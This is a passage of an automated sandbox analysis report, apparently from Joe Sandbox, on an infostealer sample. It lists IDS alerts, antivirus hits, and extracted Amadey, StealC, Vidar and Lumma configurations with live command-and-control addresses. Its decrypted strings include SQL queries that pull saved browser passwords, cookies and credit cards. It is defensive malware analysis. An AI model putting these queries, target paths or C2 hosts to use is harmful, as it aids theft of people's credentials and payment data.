2024-11-04T17:33:14.555318+0100	2803304	3	Unknown Traffic	192.168.2.5	50110	185.215.113.206	80	TCP
2024-11-04T17:33:16.577142+0100	2803304	3	Unknown Traffic	192.168.2.5	50110	185.215.113.206	80	TCP
2024-11-04T17:33:18.700860+0100	2803304	3	Unknown Traffic	192.168.2.5	50110	185.215.113.206	80	TCP
2024-11-04T17:33:19.192476+0100	2803304	3	Unknown Traffic	192.168.2.5	50110	185.215.113.206	80	TCP
2024-11-04T17:33:24.775248+0100	2803304	3	Unknown Traffic	192.168.2.5	50170	185.215.113.16	80	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T17:33:36.897974+0100	2843864	1	A Network Trojan was detected	192.168.2.5	50216	104.21.5.155	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: presticitpo.store	URL Reputation: Label: malware
Source: necklacedmny.store	URL Reputation: Label: malware
Source: fadehairucw.store	URL Reputation: Label: malware
Source: thumbystriw.store	URL Reputation: Label: phishing
Source: crisiwarny.store	URL Reputation: Label: malware
Source: http://185.215.113.206/6Y	Avira URL Cloud: Label: malware
Source: https://founpiuer.store/apih	Avira URL Cloud: Label: malware
Source: https://founpiuer.store/iV	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exe(gM	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/off/def.exeowFg	Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/746f34465cf17784/softokn3.dllEF	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/746f34465cf17784/msvcp140.dll2F	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000003.00000002.2245012498.0000000000B21000.00000040.00000001.01000000.00000007.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: 10.2.pisos23.exe.400000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["plaintifuf.site", "terracedjz.cyou", "unityshootsz.site", "honerstyzu.site", "monopuncdz.site", "uppermixturyz.site", "reinfomarbke.site", "moeventmynz.site", "bringlanejk.site"], "Build id": "FATE99--test"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\pisos23[1].exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 47%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 47%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: INSERT_KEY_HERE
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: 30
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: 11
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: 20
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: 24
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetProcAddress
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: LoadLibraryA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: lstrcatA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: OpenEventA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: CreateEventA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: CloseHandle
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Sleep
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetUserDefaultLangID
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: VirtualAllocExNuma
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: VirtualFree
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetSystemInfo
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: VirtualAlloc
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: HeapAlloc
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetComputerNameA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: lstrcpyA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetProcessHeap
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetCurrentProcess
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: lstrlenA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: ExitProcess
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GlobalMemoryStatusEx
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetSystemTime
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: SystemTimeToFileTime
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: advapi32.dll
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: gdi32.dll
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: user32.dll
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: crypt32.dll
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: ntdll.dll
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetUserNameA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: CreateDCA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetDeviceCaps
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: ReleaseDC
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: CryptStringToBinaryA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: sscanf
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: VMwareVMware
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: HAL9TH
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: JohnDoe
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: DISPLAY
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: %hu/%hu/%hu
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: http://185.215.113.206
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: bksvnsj
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: /6c4adf523b719729.php
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: /746f34465cf17784/
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: tale
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetEnvironmentVariableA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetFileAttributesA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GlobalLock
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: HeapFree
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetFileSize
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GlobalSize
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: IsWow64Process
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Process32Next
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetLocalTime
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: FreeLibrary
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetTimeZoneInformation
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetSystemPowerStatus
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetVolumeInformationA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetWindowsDirectoryA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Process32First
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetLocaleInfoA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetUserDefaultLocaleName
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetModuleFileNameA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: DeleteFileA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: FindNextFileA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: LocalFree
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: FindClose
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: SetEnvironmentVariableA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: LocalAlloc
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetFileSizeEx
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: ReadFile
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: SetFilePointer
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: WriteFile
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: CreateFileA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: FindFirstFileA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: CopyFileA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: VirtualProtect
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetLastError
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: lstrcpynA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: MultiByteToWideChar
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GlobalFree
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: WideCharToMultiByte
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GlobalAlloc
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: OpenProcess
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: TerminateProcess
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetCurrentProcessId
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: gdiplus.dll
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: ole32.dll
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: bcrypt.dll
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: wininet.dll
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: shlwapi.dll
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: shell32.dll
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: psapi.dll
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: rstrtmgr.dll
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: CreateCompatibleBitmap
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: SelectObject
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: BitBlt
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: DeleteObject
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: CreateCompatibleDC
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GdipGetImageEncodersSize
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GdipGetImageEncoders
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GdiplusStartup
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GdiplusShutdown
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GdipSaveImageToStream
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GdipDisposeImage
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GdipFree
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetHGlobalFromStream
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: CreateStreamOnHGlobal
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: CoUninitialize
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: CoInitialize
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: CoCreateInstance
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: BCryptDecrypt
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: BCryptSetProperty
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: BCryptDestroyKey
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetWindowRect
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetDesktopWindow
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetDC
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: CloseWindow
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: wsprintfA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: EnumDisplayDevicesA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetKeyboardLayoutList
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: CharToOemW
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: wsprintfW
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: RegQueryValueExA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: RegEnumKeyExA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: RegOpenKeyExA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: RegCloseKey
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: RegEnumValueA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: CryptBinaryToStringA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: CryptUnprotectData
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: SHGetFolderPathA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: ShellExecuteExA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: InternetOpenUrlA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: InternetConnectA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: InternetCloseHandle
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: InternetOpenA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: HttpSendRequestA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: HttpOpenRequestA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: InternetReadFile
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: InternetCrackUrlA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: StrCmpCA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: StrStrA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: StrCmpCW
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: PathMatchSpecA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: GetModuleFileNameExA
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: RmStartSession
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: RmRegisterResources
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: RmGetList
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: RmEndSession
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: sqlite3_open
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: sqlite3_prepare_v2
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: sqlite3_step
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: sqlite3_column_text
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: sqlite3_finalize
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: sqlite3_close
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: sqlite3_column_bytes
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: sqlite3_column_blob
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: encrypted_key
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: PATH
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: NSS_Init
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: NSS_Shutdown
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: PK11_FreeSlot
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: PK11_Authenticate
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: PK11SDR_Decrypt
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: C:\ProgramData\
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: browser:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: profile:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: url:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: login:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: password:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Opera
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: OperaGX
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Network
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: cookies
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: .txt
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: TRUE
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: FALSE
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: autofill
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: SELECT name, value FROM autofill
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: history
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: cc
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: name:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: month:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: year:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: card:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Cookies
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Login Data
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Web Data
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: History
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: logins.json
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: formSubmitURL
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: usernameField
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: encryptedUsername
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: encryptedPassword
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: guid
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: cookies.sqlite
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: formhistory.sqlite
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: places.sqlite
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: plugins
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Local Extension Settings
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Sync Extension Settings
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: IndexedDB
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Opera Stable
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Opera GX Stable
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: CURRENT
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: chrome-extension_
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: _0.indexeddb.leveldb
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Local State
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: profiles.ini
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: chrome
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: opera
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: firefox
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: wallets
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: %08lX%04lX%lu
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: ProductName
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: x32
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: x64
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: ProcessorNameString
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: DisplayName
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: DisplayVersion
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Network Info:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: - IP: IP?
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: - Country: ISO?
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: System Summary:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: - HWID:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: - OS:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: - Architecture:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: - UserName:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: - Computer Name:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: - Local Time:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: - UTC:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: - Language:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: - Keyboards:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: - Laptop:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: - Running Path:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: - CPU:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: - Threads:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: - Cores:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: - RAM:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: - Display Resolution:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: - GPU:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: User Agents:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Installed Apps:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: All Users:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Current User:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Process List:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: system_info.txt
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: freebl3.dll
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: mozglue.dll
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: msvcp140.dll
